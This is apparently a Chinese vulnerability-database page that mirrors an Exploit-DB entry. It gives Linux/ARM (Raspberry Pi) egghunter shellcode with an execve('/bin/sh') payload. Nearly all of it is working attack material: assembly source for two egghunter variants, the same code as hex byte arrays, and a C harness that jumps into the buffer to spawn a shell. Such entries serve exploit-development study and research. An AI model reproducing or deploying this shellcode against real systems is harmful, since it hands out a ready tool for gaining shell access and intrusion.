Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1069302 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ARM CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/44811
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Linux/ARM (Raspberry Pi) - Egghunter + /bin/sh Shellcode (32 bytes)

------------------------------
// If your shellcode in higer address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-higher.s
.section .text
.global _start
    _start:
    .code 32
    add r3, pc, #1      // switch to thumb mode
    bx r3

    .code 16
    adr r1, startpoint  // set r1 to start point address
    ldr r2, egg         // set r2 to egg's value

    next_addr:
    add r1, r1, #1      // increment scan address
    ldr r3, [r1]        // set r3 to the value stored in r1's address
    cmp r2, r3          // compare values
    bne next_addr       // if failed to find egg, jump to next address

    mov r3, pc          // switch to arm mode
    bx r3

    .code 32
    mov pc, r1          // jump to found address

egg:
.ascii "\x50\x90\x50\x90"
startpoint:

pi@raspberrypi:~ $ 

------------------------------
// If your shellcode in lower address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-lower.s
.section .text
.global _start
    _start:
    .code 32
    add r3, pc, #1      // switch to thumb mode
    bx r3

    .code 16
    adr r1, startpoint  // set r1 to start point address
    ldr r2, egg         // set r2 to egg's value

    next_addr:
    sub r1, r1, #1      // increment scan address
    ldr r3, [r1]        // set r3 to the value stored in r1's address
    cmp r2, r3          // compare values
    bne next_addr       // if failed to find egg, jump to next address

    startpoint:
    mov r3, pc          // switch to arm mode
    bx r3

    .code 32
    mov pc, r1          // jump to found address

egg:
.ascii "\x50\x90\x50\x90"

pi@raspberrypi:~ $ 

------------------------------
*/

#include <stdio.h>
#include <string.h>

// If your shellcode in higer address, use following egghunter.
unsigned char egghunter[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x05\xa1\x04\x4a\x01\x31\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";

unsigned char egg[] = \
"\x50\x90\x50\x90" // egg tag
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1" // execve('/bin/sh')
"\x49\x40\x52\x40\x01\xa0\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x41";

// If your shellcode in lower address, use following egghunter.
//unsigned char egghunter[] = \
//"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa1\x04\x4a\x01\x39\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";

void main()
{
    printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
    printf("Egg shellcode Length:  %d\n", strlen(egg));

    int (*ret)() = (int(*)())egghunter;

    ret();
}